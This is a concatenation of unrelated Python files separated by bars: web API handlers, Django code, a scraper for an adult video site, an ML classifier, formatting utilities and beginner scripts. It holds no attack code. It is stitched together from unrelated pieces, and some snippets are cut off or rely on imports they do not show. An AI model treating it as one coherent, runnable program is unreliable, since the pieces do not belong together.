    parameter was named ``recipient``, so FastAPI never bound the path
    variable and instead required a ``recipient`` query parameter.
    """
    db_transactions = crud.get_transactions_by_recipient(db, recipient=recipient_code)
    if db_transactions is None:
        raise HTTPException(status_code=404, detail="Transactions not found")
    return db_transactions
@app.get("/transaction/id/{transaction_id}", response_model=schemas.Transaction)
def read_transaction(transaction_id: int, db: Session = Depends(get_db)):
    """Fetch a transaction by primary key; 404 when absent."""
    found = crud.get_transaction(db, transaction_id=transaction_id)
    if found is None:
        raise HTTPException(status_code=404, detail="Transaction not found")
    return found
# Cart
@app.post("/cart/", response_model=schemas.Cart)
def create_cart(cart: schemas.CartCreate, db: Session = Depends(get_db)):
    """Persist a new cart entry."""
    return crud.create_cart(db=db, cart=cart)
@app.get("/cart/transaction/{transaction_id}", response_model=schemas.Cart)
def read_cart_by_transaction(transaction_id: int, db: Session = Depends(get_db)):
    """Fetch the cart attached to a transaction; 404 when absent."""
    found = crud.get_cart_by_transaction(db, transaction_id=transaction_id)
    if found is None:
        raise HTTPException(status_code=404, detail="Cart not found")
    return found
@app.get("/cart/product/{product_id}", response_model=schemas.Cart)
def read_cart_by_product(product_id: int, db: Session = Depends(get_db)):
    """Fetch the cart containing a given product; 404 when absent."""
    found = crud.get_cart_by_product_id(db, product_id=product_id)
    if found is None:
        raise HTTPException(status_code=404, detail="Cart not found")
    return found
@app.get("/cart/id/{cart_id}", response_model=schemas.Cart)
def read_cart(cart_id: int, db: Session = Depends(get_db)):
    """Fetch a cart by primary key; 404 when absent.

    BUG FIX: this handler was also named ``read_transaction``, silently
    shadowing the transaction handler defined earlier in the module; renamed
    to match its route (the route path itself is unchanged).
    """
    db_cart = crud.get_cart(db, cart_id=cart_id)
    if db_cart is None:
        raise HTTPException(status_code=404, detail="Cart not found")
    return db_cart
|
# "TF Girls Training Guide", Episode 4
# Getting started with machine learning for real
# First, let's set a goal: image recognition
# We'll use the Udacity Deep Learning assignment as supporting material
# 1. Download the data: http://ufldl.stanford.edu/housenumbers/
# 2. Explore the data
# 3. Preprocess the data
# 4. Build a basic network -- core concepts + code, the world of TensorFlow
# 5. Convolution
# 6. Time to experiment
# 7. Fine-tuning and results
|
"""
URL patterns for personal app
"""
from django.conf.urls import url
from . import views
urlpatterns = [
    # NOTE(review): django.conf.urls.url was deprecated in Django 3.1 and
    # removed in 4.0; migrate to django.urls.re_path (or path) when upgrading.
    url(r'^portfolio$', views.portfolio, name='portfolio'),
    url(r'^about$', views.about, name='about'),
]
|
from clint.textui import progress
from django.core.management.base import BaseCommand
from django.db.models import Count
from shapes.models import MaterialShape
from normals.tasks import auto_rectify_shape
class Command(BaseCommand):
    """Management command that queues auto-rectification tasks for eligible shapes."""
    args = ''
    help = 'Auto-rectify all shapes'
    def handle(self, *args, **options):
        # Select correct, planar shapes that have at least one rectified
        # normal, none of them automatic, largest (by vertex count) first.
        # NOTE(review): both .exclude(rectified_normal__automatic=True) and
        # .filter(rectified_normals__automatic=False) appear, using singular
        # vs. plural related names -- confirm both lookups are intended.
        ids = MaterialShape.objects.filter(correct=True, planar=True) \
            .exclude(rectified_normal__automatic=True) \
            .filter(rectified_normals__automatic=False) \
            .annotate(c=Count('rectified_normals')) \
            .filter(c__gt=0) \
            .order_by('-num_vertices') \
            .values_list('id', flat=True)
        # Dispatch one async task per shape id, showing a progress bar.
        for id in progress.bar(ids):
            auto_rectify_shape.delay(id)
|
__author__ = 'Vit'
from bs4 import BeautifulSoup
from urllib.parse import unquote
from data_format.url import URL
from data_format.fl_data import FLData
from common.util import _iter, quotes, psp
from interface.view_manager_interface import ViewManagerFromModelInterface
from model.site.parser import BaseSiteParser
class YPData(FLData):
    """FLData variant that additionally carries a ``part`` tag."""
    def __init__(self, url: URL, part: str):
        super().__init__(url, '')
        self.part=part
class SexixSite(BaseSiteParser):
    """Site parser for sexix.net: thumbnail listings, tag clouds and video playlists."""
    @staticmethod
    def can_accept_url(url: URL) -> bool:
        # This parser handles any URL on the sexix.net domain.
        return url.contain('sexix.net/')
    @staticmethod
    def create_start_button(view:ViewManagerFromModelInterface):
        """Register this site's entry button (newest-first listing) in the start view."""
        view.add_start_button(picture_filename='model/site/resource/sexis.png',
                              url=URL("http://sexix.net/?orderby=date*"))
    def get_shrink_name(self):
        # Short identifier used by the framework for this site.
        return 'SXX'
    def parse_thumbs(self, soup: BeautifulSoup, url: URL):
        """Collect thumbnail tiles (link, image, caption) from a listing page."""
        for thumbnail in _iter(soup.find_all('div', {'class': 'thumb'})):
            href = URL(thumbnail.a.attrs['href'], base_url=url)
            description = thumbnail.a.img.attrs['alt']
            thumb_url = URL(thumbnail.img.attrs['src'], base_url=url)
            self.add_thumb(thumb_url=thumb_url, href=href, popup=description,
                           labels=[{'text': description, 'align': 'bottom center'}])
    def get_pagination_container(self, soup: BeautifulSoup) -> BeautifulSoup:
        # WordPress-style pagination block.
        return soup.find('div',{'class':'wp-pagenavi'})
    def parse_thumbs_tags(self, soup: BeautifulSoup, url: URL):
        """Collect the tag cloud, keeping only /videotag/ links, sorted by label."""
        cloud=soup.find('div', {'class':'tagcloud'})
        tags=dict()
        for href in _iter(cloud.find_all('a')):
            tag_href=href.attrs['href']
            label=href.string
            if '/videotag/' in tag_href:
                tags[label]=URL(tag_href)
        for label in sorted(tags):
            self.add_tag(label,tags[label])
    def parse_video(self, soup: BeautifulSoup, url: URL):
        """Step 1: kick off async loading of the embedded player iframe for a video."""
        video_container=soup.find('div',{'class':'videoContainer'})
        if video_container:
            # psp(video_container)
            source_file=URL(video_container.iframe.attrs['src'], base_url=url,referer=url)
            filedata=FLData(source_file,'')
            self._result_type = 'video'
            self.model.loader.start_load_file(filedata,self.continue_parse_video)
    def continue_parse_video(self, fldata:FLData):
        """Step 2: extract the jwplayer playlist URL from the loaded player page."""
        playlist_file=URL(quotes(fldata.text, "jwplayer().load('", "'")+'*')
        filedata = FLData(playlist_file, '')
        self.model.loader.start_load_file(filedata, self.continue_parse_video2)
    def continue_parse_video2(self, fldata:FLData):
        """Step 3: parse the playlist and register each quality variant."""
        # 'jwplayer:source' is not a tag name html.parser accepts, so rename it
        # before parsing.
        playlist=BeautifulSoup(fldata.text.replace('jwplayer:source','jjj'), "html.parser")
        for item in playlist.find_all('jjj'):
            # psp(unquote(str(item)))
            if item.attrs.get('file',''):
                video_url=URL(unquote(str(item.attrs['file'])))
                label=item.attrs['label']
                self.add_video(label,video_url)
        self.generate_video_view()
    def parse_video_tags(self, soup: BeautifulSoup, url: URL):
        """Collect /videotag/ links from the video's info box."""
        info=soup.find('div',{'id':'info'})
        for href in _iter(info.find_all('a')):
            tag_href=href.attrs['href']
            label=href.string
            if '/videotag/' in tag_href:
                self.add_tag(label,URL(tag_href))
if __name__ == "__main__":
    # Module is only used as part of the application; nothing to run directly.
    pass
|
#!/usr/bin/python
# File name: if.py
# Simple guess-the-number demo of if/elif/else.
number = 23
guess = int(input('Enter an integer:'))
if guess == number:
    # BUG FIX: corrected misspelled user-facing messages
    # ('Congurations' -> 'Congratulations', 'litter' -> 'little').
    print('Congratulations, you guessed it.')
    print('But you do not win any prizes!')
elif guess < number:
    print('No, it is a little higher than that')
else:
    print('No, it is a little lower than that')
print('Done')
import pandas as pd
import numpy as np
from sklearn.experimental import enable_hist_gradient_boosting
from sklearn.ensemble import HistGradientBoostingClassifier
from sklearn.preprocessing import OneHotEncoder
from sklearn.model_selection import cross_val_score
# The 21 amino-acid one-letter codes (20 standard plus selenocysteine 'U')
# forming the categorical alphabet for one-hot encoding.
amino_acids = np.array(['R', 'H' ,'K' ,'D' ,'E' ,'S' ,'T' ,'N' ,'Q' ,'C' ,'U' ,'G' ,'P' ,'A' ,'I' ,'L' ,'M' ,'F' ,'W' ,'Y' ,'V'])
# Train/test splits; column 0 is assumed to hold the peptide sequence -- TODO confirm.
train_data = pd.read_csv('./datasets/train.csv')
test_data = pd.read_csv('./datasets/test.csv')
def feature_processing(data):
    """One-hot encode the sequence in column 0 of each row.

    Each sequence is expanded character-by-character over the amino_acids
    alphabet and flattened into a single feature vector.
    """
    encoder = OneHotEncoder()
    encoder.fit(amino_acids.reshape(-1, 1))
    return [
        encoder.transform(np.array(list(row[0])).reshape(-1, 1)).toarray().ravel()
        for row in data.values
    ]
# Build feature matrices and train the gradient-boosted classifier.
X_train = feature_processing(train_data)
y_train = train_data['Active'].values
X_test = feature_processing(test_data)
# NOTE(review): 'scoring' here influences early stopping only -- confirm
# these hyperparameters are the tuned ones.
clf = HistGradientBoostingClassifier(l2_regularization=1.0, learning_rate=0.15, max_iter=200, max_leaf_nodes=150, min_samples_leaf=50, scoring='f1')
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
# 5-fold cross-validated F1 on the training set (refits the model 5 times).
score = cross_val_score(clf, X_train, y_train, cv=5, scoring='f1').mean()
print(score)
# Write the test predictions without index or header for submission.
y_pred_df = pd.DataFrame(y_pred)
y_pred_df.to_csv('sub.csv', index=False, header=False)
|
from codecs import open
from re import findall, sub, IGNORECASE
import sys
with open('../transcript.txt', 'r') as f:
    lines = f.readlines()
# Build one fuzzy regex per transcript line: allow an optional stress mark
# after each letter, flexible whitespace/punctuation between words, and
# optional trailing punctuation at the end of the line.
search_patterns = [None] * len(lines)
for i, line in enumerate(lines):
    line = line.strip()
    # After every word character (incl. accented letters), optionally match a stress mark.
    line = sub(r'[\wą-ž]', r'\g<0>[~`^]?', line)
    line = sub(r' ', r'[\s:;,]+', line)
    line = sub(r'$', r'[\.:;\?!,]*', line)
    search_patterns[i] = line
with open('__final_1.txt', 'r') as f:
    text = f.read()
with open('../transcript_stressed_updated.txt', 'r') as f:
    res = f.readlines()
# For each pattern, keep the longest unique match found in the stressed text.
for i, p in enumerate(search_patterns):
    f = findall(p, text, IGNORECASE)
    if f:
        f = list(set(f))
        f.sort(key=len, reverse=True)
        # Collapse newlines and runs of spaces before storing/printing.
        line = sub('[\r\n]', ' ', f[0])
        line = sub(' +', ' ', line)
        res[i] = line + '\n'
        print(line)
#with open('../transcript_stressed_v3.txt', 'w') as f:
#    f.writelines(res)
|
# from django.contrib.auth.models import User
from django.http import Http404
# from django.shortcuts import render
from rest_framework import viewsets, status
from rest_framework.response import Response
from rest_framework.views import APIView
from django.contrib.auth.models import User
from .models import Client, Talent
from .serializers import ClientSerializer, TalentSerializer, UserSerializer
class UserClientViewSet(viewsets.ModelViewSet):
    """Router-driven full CRUD endpoints for the Client model."""
    serializer_class = ClientSerializer
    queryset = Client.objects.all()
class ClientList(APIView):
    """List all clients or create a new one."""

    def get(self, request):
        """Return every Client, serialized."""
        serializer = ClientSerializer(Client.objects.all(), many=True)
        return Response(serializer.data)

    def post(self, request):
        """Create a Client from the request body; 400 on validation failure."""
        serializer = ClientSerializer(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)
class ClientDetail(APIView):
    """Retrieve, update or delete a single Client by id."""

    def get_object(self, client_id):
        """Fetch the Client or raise Http404 if it does not exist."""
        try:
            return Client.objects.get(id=client_id)
        except Client.DoesNotExist:
            raise Http404

    def get(self, request, client_id):
        """Return the serialized Client."""
        return Response(ClientSerializer(self.get_object(client_id)).data)

    def put(self, request, client_id):
        """Replace the Client with the request body; 400 on validation failure."""
        serializer = ClientSerializer(self.get_object(client_id), data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return Response(serializer.data)

    def delete(self, request, client_id):
        """Delete the Client and return 204."""
        self.get_object(client_id).delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
class TalentList(APIView):
    """List all talents or create a new one."""

    def get(self, request):
        """Return every Talent, serialized."""
        serializer = TalentSerializer(Talent.objects.all(), many=True)
        return Response(serializer.data)

    def post(self, request):
        """Create a Talent from the request body; 400 on validation failure."""
        serializer = TalentSerializer(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)
class TalentDetail(APIView):
    """Retrieve, update or delete a single Talent by id."""

    def get_object(self, talent_id):
        """Fetch the Talent or raise Http404 if it does not exist."""
        try:
            return Talent.objects.get(id=talent_id)
        except Talent.DoesNotExist:
            raise Http404

    def get(self, request, talent_id):
        """Return the serialized Talent."""
        return Response(TalentSerializer(self.get_object(talent_id)).data)

    def put(self, request, talent_id):
        """Replace the Talent with the request body; 400 on validation failure."""
        serializer = TalentSerializer(self.get_object(talent_id), data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return Response(serializer.data)

    def delete(self, request, talent_id):
        """Delete the Talent and return 204."""
        self.get_object(talent_id).delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
class UserList(APIView):
    """List all users or create a new one."""

    def get(self, request):
        """Return every User, serialized."""
        serializer = UserSerializer(User.objects.all(), many=True)
        return Response(serializer.data)

    def post(self, request):
        """Create a User from the request body; 400 on validation failure."""
        serializer = UserSerializer(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)
class UserDetail(APIView):
    """Retrieve, update or delete a single User by id."""

    def get_object(self, user_id):
        """Fetch the User or raise Http404 if it does not exist."""
        try:
            return User.objects.get(id=user_id)
        except User.DoesNotExist:
            raise Http404

    def get(self, request, user_id):
        """Return the serialized User."""
        return Response(UserSerializer(self.get_object(user_id)).data)

    def put(self, request, user_id):
        """Replace the User with the request body; 400 on validation failure."""
        serializer = UserSerializer(self.get_object(user_id), data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return Response(serializer.data)

    def delete(self, request, user_id):
        """Delete the User and return 204."""
        self.get_object(user_id).delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
#
from positive import *
# safely join directory strings
# safely join directory strings
def osjoin(a, b):
    """Join two path components and return the result as a plain string."""
    from os.path import join
    return str(join(a, b))
# Class for basic print manipulation
class print_format:
    """ANSI escape sequences for colored / styled terminal output.

    Prepend an attribute to text and append `end` to reset the terminal.
    """
    magenta = '\033[0;35m'
    cyan = '\033[0;36m'
    darkcyan = '\033[0;36m'  # same code as cyan
    blue = '\033[0;34m'
    green = '\033[92m'
    yellow = '\033[0;33m'
    red = '\033[31m'
    bold = '\033[1m'
    grey = gray = '\033[1;30m'  # both spellings supported
    ul = '\033[4m'
    end = '\x1b[0m'  # reset all attributes
    hlb = '\033[5;30;42m'  # blinking black-on-green highlight
    underline = '\033[4m'
# Convenience wrappers around print_format: each returns the input string
# with the matching ANSI style code prepended and a reset code appended.
def bold(string):
    return print_format.bold + string + print_format.end
def red(string):
    return print_format.red + string + print_format.end
def green(string):
    return print_format.green + string + print_format.end
def magenta(string):
    return print_format.magenta + string + print_format.end
def blue(string):
    return print_format.blue + string + print_format.end
def grey(string):
    return print_format.grey + string + print_format.end
def yellow(string):
    return print_format.yellow + string + print_format.end
def cyan(string):
    return print_format.cyan + string + print_format.end
def darkcyan(string):
    return print_format.darkcyan + string + print_format.end
def textul(string):
    return print_format.underline + string + print_format.end
def underline(string):
    return print_format.underline + string + print_format.end
def hlblack(string):
    return print_format.hlb + string + print_format.end
#
def poly2latex(basis_symbols,coeffs,latex_labels=None,precision=8,term_split=1000):
    """Render a multivariate polynomial (basis symbols + coefficients) as LaTeX.

    latex_labels, if given, is [function_label, variable_labels, prefix].
    Basis symbols follow the project's convention where 'K' marks the
    constant term and digit characters index domain variables.
    term_split inserts a LaTeX line break after that many terms.
    """
    # Import useful things
    from numpy import mod
    # Tracks whether a line break has already been emitted.
    split_state = False
    # Count the number of unique domain variables ('K' is the constant marker).
    domain_dimension = len( set(''.join(basis_symbols).replace('K','')) )
    # Degenerate empty fit: represent as a single zero constant.
    if len(basis_symbols)==len(coeffs)==0:
        basis_symbols=['']
        coeffs = [0]
    # Extract desired labels and handle defaults
    funlabel = r'f(\vec{x})' if latex_labels is None else latex_labels[0]
    varlabel = [ 'x%i'%k for k in range(domain_dimension) ] if latex_labels is None else latex_labels[1]
    prefix = '' if latex_labels is None else latex_labels[2]
    if varlabel is None:
        varlabel = [ r'x_%i'%k for k in range(domain_dimension) ]
    elif len(varlabel) != domain_dimension:
        error( 'Number of variable labels, %i, is not equal to the number of domain dimensions found, %i.'%( len(varlabel), domain_dimension ) )
    # Create a simple string representation of the fit: first (constant) term.
    latex_str = r'%s \; &= \; %s %s\,x%s%s' % ( funlabel,
                                                (prefix+r' \, ( \,') if prefix else '',
                                                complex2str(coeffs[0],
                                                latex=True,precision=precision) if isinstance(coeffs[0],complex) else '%1.4e'%coeffs[0], r'\,x'.join( list(basis_symbols[0]) ), '' if len(coeffs)>1 else (r' \; )' if prefix else '') )
    # Append each remaining term; close the prefix parenthesis on the last one.
    for k,b in enumerate(coeffs[1:]):
        latex_str += r' \; + \; (%s)\,x%s%s' % ( complex2str(b,latex=True,precision=precision) if isinstance(b,complex) else '%1.4e'%b ,
                                                 r'\,x'.join( list(basis_symbols[k+1]) ),
                                                 (r' \; )' if prefix else '') if (k+1)==len(coeffs[1:]) else '' )
        # Break the equation across lines every term_split terms.
        if ( not mod(k+2,term_split) ) and ( (k+1) < len(coeffs[1:]) ):
            latex_str += '\n \\\\ \\nonumber\n & \quad '
            if not split_state:
                split_state = not split_state
    # Correct for a lingering multiply sign
    latex_str = latex_str.replace('(\,','(')
    # Correct for the constant term not being an explicit function of a domain variable
    latex_str = latex_str.replace('\,xK','')
    # Replace variable labels with input
    for k in range(domain_dimension):
        latex_str = latex_str.replace( 'x%i'%k, varlabel[k] )
    # Replace repeated variable labels with power notation
    for pattern in varlabel:
        latex_str = rep2pwr( latex_str, pattern, r'\,' )
    return latex_str
# Convert poylnomial (basis symbols and coefficients) to python string
def poly2pystr(basis_symbols,coeffs,labels=None,precision=8):
    '''
    Render a multivariate polynomial as a python lambda source string.

    It's useful to know:
    * That "labels" is of the following form
      * labels = [range_label,domain_labels,python_prefix]
      * EXAMPLE: labels = [ 'temperature', ['day','longitude','latitude','aliens_influence_measure'], '' ]
    * The length of basis_symbols and coeffs must match.
    * basis_symbols must be consistent with positive.learning.symeval
      * EXAMPLE: basis_symbols = ['K','0','1','00']
      * this corresponds to a c0 + c1*x + c2*y + c3*x^2, and coeffs = [c0,c1,c2,c3]
    '''
    # Import usefuls
    from positive.api import error
    # Degenerate empty fit: represent as a single zero constant.
    if len(basis_symbols)==len(coeffs)==0:
        basis_symbols=['']
        coeffs = [0]
    # Count the number of unique domain variables ('K' is the constant marker).
    domain_dimension = len( set(''.join(basis_symbols).replace('K','')) )
    # Extract desired labels and handle defaults
    funlabel = 'f' if labels is None else labels[0]
    varlabels = None if labels is None else labels[1]
    prefix = '' if labels is None else labels[2]
    # Optional 4th entry: text appended after the closing parenthesis.
    postfix = '' if labels is None else ( labels[3] if len(labels)==4 else '' )
    if varlabels is None:
        varlabels = [ 'x%s'%str(k) for k in range(domain_dimension) ]
    elif len(varlabels) != domain_dimension:
        error( 'Number of variable labels, %i, is not equal to the number of domain dimensions found, %i. One posiility is that youre fitting with a 1D domain, and have attempted to use a domain label that is a tuple containing a single string which python may interpret as a string -- try defining the label as a list by using square brackets.'%( len(varlabels), domain_dimension ) , 'mvpolyfit' )
    # Replace minus signs in function name with M (minus is not valid in identifiers)
    funlabel = funlabel.replace('-','M')
    # Create a simple string representation of the fit: lambda header + constant term.
    model_str = '%s = lambda %s:%s%s*(x%s)' % ( funlabel, ','.join(varlabels), (' %s('%prefix) if prefix else ' ' , complex2str(coeffs[0],precision=precision) if isinstance(coeffs[0],complex) else ('%%1.%ie'%precision)%coeffs[0], '*x'.join( list(basis_symbols[0]) ) )
    # Append each remaining term.
    for k,b in enumerate(coeffs[1:]):
        model_str += ' + %s*(x%s)' % ( complex2str(b,precision=precision) if isinstance(b,complex) else ('%%1.%ie'%precision)%b , '*x'.join( list(basis_symbols[k+1]) ) )
    # Correct for a lingering multiply sign
    model_str = model_str.replace('(*','(')
    # Correct for the constant term not being an explicit function of a domain variable
    model_str = model_str.replace('*(xK)','')
    # if there is a prefix, then close the automatic ()
    model_str += ' )' if prefix else ''
    #
    model_str += postfix
    # Replace variable labels with input
    if not ( varlabels is None ):
        for k in range(domain_dimension):
            model_str = model_str.replace( 'x%i'%k, varlabels[k] )
    return model_str
# Convert complex number to string in exponential form
def complex2str( x, precision=None, latex=False ):
    '''Convert a complex number (or list/tuple/ndarray of them) to a string
    in amplitude-phase exponential form.

    Numbers with negligible imaginary part are printed as plain reals.
    precision sets the number of decimal places (default 8); latex switches
    the output to LaTeX markup.
    '''
    # Import useful things
    from numpy import ndarray,angle,abs,pi
    # Handle optional precision input (negative values are treated as positive).
    precision = 8 if precision is None else precision
    precision = -precision if precision<0 else precision
    # Create function to convert single number to string
    def c2s(y):
        # Coerce non-complex numerics (int, float, ...) instead of silently
        # building an error message that was never raised (old dead code).
        if not isinstance(y,complex):
            y = complex(y)
        # Treat a negligible imaginary part as purely real.
        handle_as_real = abs(y.imag) < (10**(-precision))
        if handle_as_real:
            fmt = '%s1.%if'%(r'%',precision)
            ans_ = '%s' % ( fmt ) % y.real
        else:
            # Compute amplitude and phase
            amp,phase = abs(y),angle(y)
            # Write phase as positive number
            phase = phase+2*pi if phase<0 else phase
            # Create string in amp*exp(phase j) / LaTeX e^{...i} form
            fmt = '%s1.%if'%(r'%',precision)
            ans_ = '%s*%s%s%s' % (fmt, 'e^{' if latex else 'exp(' ,fmt, 'i}' if latex else 'j)') % (amp,phase)
            if latex: ans_ = ans_.replace('*',r'\,')
        return ans_
    # Create the final string representation (join sequences with '+')
    if isinstance(x,(list,ndarray,tuple)):
        s = [ c2s(c) for c in x ]
        ans = (r'\,+\,' if latex else ' + ').join(s)
    else:
        ans = c2s(x)
    # Return the answer
    return ans
# Rudimentary function for printing text in the center of the terminal window
def center_space(str):
    """Return the spaces needed to left-pad *str* so it prints centered.

    Uses shutil.get_terminal_size instead of parsing `stty size` output,
    which spawned a subprocess and failed on Windows or when stdout is
    not a tty. Falls back to zero padding when the width is unknown.
    """
    import shutil
    # fallback=(0, 0) mirrors the old behavior of empty `stty` output.
    columns = shutil.get_terminal_size(fallback=(0, 0)).columns
    if columns:
        a = ( float(columns) - float(len(str)+1.0) ) /2.0
    else:
        a = 0
    return ' '*int(a)
def center_print(str):
    """Print *str* horizontally centered in the terminal window."""
    print(center_space(str) + str)
# Print a short about statement to the prompt
def print_hl(symbol="<>"):
    '''
    Simple function for printing horizontal line across terminal.

    Uses shutil.get_terminal_size instead of parsing `stty size` output,
    which spawned a subprocess and failed on Windows or off-tty; prints
    nothing when the terminal width is unknown.
    ~ ll2'14
    '''
    import shutil
    columns = shutil.get_terminal_size(fallback=(0, 0)).columns
    if columns:
        print(symbol*int(float(columns)/float(len(symbol))))
# Function that returns randome strings of desired length and component of the desired set of characters
# Function that returns randome strings of desired length and component of the desired set of characters
def rand_str(size=2**4, characters=string.ascii_uppercase + string.digits):
    '''
    Return a random string of the given length, drawn from the given characters.
    Started from: https://stackoverflow.com/questions/2257441/random-string-generation-with-upper-case-letters-and-digits-in-python
    -- ll2'14
    '''
    # De-duplicate so every character is equally likely to be chosen.
    pool = ''.join(set(characters))
    picks = [random.choice(pool) for _ in range(size)]
    return ''.join(picks)
# Given a string with repeated symbols, convert the repetitions to power notation
def rep2pwr( string, # String to be processed
             pattern, # Pattern to look for
             delimiter, # Delimeter
             latex=True,
             pwrfun=None ): # Operation to apply to repetitions of the pattern
    '''
    Given a string with repeated symbols, convert the repetitions to power notation.
    Example:
    >> a = '*x*x*x'
    >> enpower(a,'*x')
    x^{3}
    '''
    # Default power formatter: {pattern}^{N}
    if pwrfun is None:
        pwrfun = lambda pattern, N: '{%s}^{%i}' % (pattern, N)
    # Upper bound on the repetition count (total pattern instances + 1;
    # the slack is deliberate and harmless).
    max_reps = len(string.split(pattern))
    result = str(string)
    # Replace the longest runs first so shorter runs nested in them are
    # not clobbered prematurely.
    for count in range(max_reps, 1, -1):
        run = delimiter.join([pattern] * count)
        result = result.replace(run, pwrfun(pattern, count))
    return result
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkemr.endpoint import endpoint_data
class MetastoreUpdateTableRequest(RpcRequest):
	"""Request object for the EMR MetastoreUpdateTable RPC (API version 2016-04-08)."""

	def __init__(self):
		RpcRequest.__init__(self, 'Emr', '2016-04-08', 'MetastoreUpdateTable','emr')
		# Propagate SDK endpoint data when this SDK version supports it.
		if hasattr(self, "endpoint_map"):
			setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
		if hasattr(self, "endpoint_regional"):
			setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())

	def get_ResourceOwnerId(self):
		return self.get_query_params().get('ResourceOwnerId')

	def set_ResourceOwnerId(self,ResourceOwnerId):
		self.add_query_param('ResourceOwnerId',ResourceOwnerId)

	def get_AddColumns(self):
		return self.get_query_params().get('AddColumns')

	def set_AddColumns(self,AddColumns):
		# Flatten each column dict into 1-based indexed query parameters.
		for index, column in enumerate(AddColumns, start=1):
			for field in ('Name', 'Comment', 'Type'):
				if column.get(field) is not None:
					self.add_query_param('AddColumn.%d.%s' % (index, field), column.get(field))

	def get_AddPartitions(self):
		return self.get_query_params().get('AddPartitions')

	def set_AddPartitions(self,AddPartitions):
		# Flatten each partition dict into 1-based indexed query parameters.
		for index, partition in enumerate(AddPartitions, start=1):
			for field in ('Name', 'Comment', 'Type'):
				if partition.get(field) is not None:
					self.add_query_param('AddPartition.%d.%s' % (index, field), partition.get(field))

	def get_DeleteColumnNames(self):
		return self.get_query_params().get('DeleteColumnNames')

	def set_DeleteColumnNames(self,DeleteColumnNames):
		for index, name in enumerate(DeleteColumnNames, start=1):
			if name is not None:
				self.add_query_param('DeleteColumnName.%d' % index, name)

	def get_TableId(self):
		return self.get_query_params().get('TableId')

	def set_TableId(self,TableId):
		self.add_query_param('TableId',TableId)

	def get_DeletePartitionNames(self):
		return self.get_query_params().get('DeletePartitionNames')

	def set_DeletePartitionNames(self,DeletePartitionNames):
		for index, name in enumerate(DeletePartitionNames, start=1):
			if name is not None:
				self.add_query_param('DeletePartitionName.%d' % index, name)
# Messenger structured-message template type identifiers used in
# attachment payloads below.
TEMPLATE_TYPE_BUTTON = 'button'
TEMPLATE_TYPE_GENERIC = 'generic'
class TemplateElement(object):
    """A single card inside a structured message template.

    Enforces the platform limits of 80 characters for title/subtitle and
    at most 3 buttons per element.
    """

    def __init__(self, title, subtitle=None, item_url=None, image_url=None, buttons=None):
        assert len(title) < 81, 'Title limit of 80 chars reached'
        if subtitle is not None:
            assert len(subtitle) < 81, 'Subtitle limit of 80 reached'
        if buttons is not None:
            assert len(buttons) < 4, 'You can only have 3 buttons in an element'
        self.title = title
        self.subtitle = subtitle
        self.item_url = item_url
        self.image_url = image_url
        self.buttons = [] if buttons is None else buttons

    def to_dict(self):
        """Serialize the element, omitting optional fields that are unset."""
        payload = {'title': self.title}
        for key in ('subtitle', 'item_url', 'image_url'):
            value = getattr(self, key)
            if value is not None:
                payload[key] = value
        if len(self.buttons):
            payload['buttons'] = [button.to_dict() for button in self.buttons]
        return payload
class GenericTemplate(object):
    """Wraps TemplateElements in a generic-template attachment payload."""

    def __init__(self, elements):
        self.elements = elements

    def to_dict(self):
        """Serialize as a 'template' attachment of generic type."""
        serialized = [element.to_dict() for element in self.elements]
        return {
            'type': 'template',
            'payload': {
                'template_type': TEMPLATE_TYPE_GENERIC,
                'elements': serialized,
            },
        }
class ButtonTemplate(object):
    """Wraps text plus buttons in a button-template attachment payload."""

    def __init__(self, text, buttons):
        self.text = text
        self.buttons = buttons

    def to_dict(self):
        """Serialize as a 'template' attachment of button type."""
        serialized = [button.to_dict() for button in self.buttons]
        return {
            'type': 'template',
            'payload': {
                'template_type': TEMPLATE_TYPE_BUTTON,
                'text': self.text,
                'buttons': serialized,
            },
        }
|
def replace(identifier_commit_invalid):
    """Replaces a snapshot.

    The docstring previously appeared after two stray debug prints, so it
    was a plain statement rather than a docstring; the leftover debug
    prints have been removed.
    """
    app = get_app()
    snapshot = app.get_snapshot(identifier_commit_invalid)
    if not snapshot:
        click.echo("Couldn't find snapshot %s" % identifier_commit_invalid)
        sys.exit(1)
    # Replace = remove the existing snapshot, then recreate it under the same id.
    app.remove_snapshot(snapshot)
    app.create_snapshot(identifier_commit_invalid)
    click.echo('Replaced snapshot %s' % identifier_commit_invalid)
|
# Read comma-separated monthly rainfall figures and report max/min/average.
print('This app will do things to rainfall data')
print('----------------------------------------')
monthlyFall = input('Enter the monthly rainfall sep by comma eg 5,6,7,8')
# Convert each comma-separated entry to an integer in one pass
# (replaces the manual index loop and the redundant initial empty list).
rainFall = [int(value) for value in monthlyFall.split(',')]
# Builtin aggregation instead of a manual accumulation loop.
total = sum(rainFall)
maxFall = max(rainFall)
minFall = min(rainFall)
averageFall = total/len(rainFall)
print('The highest rainfall was {0} \n'
      'The lowest rainfall was {1} \n'
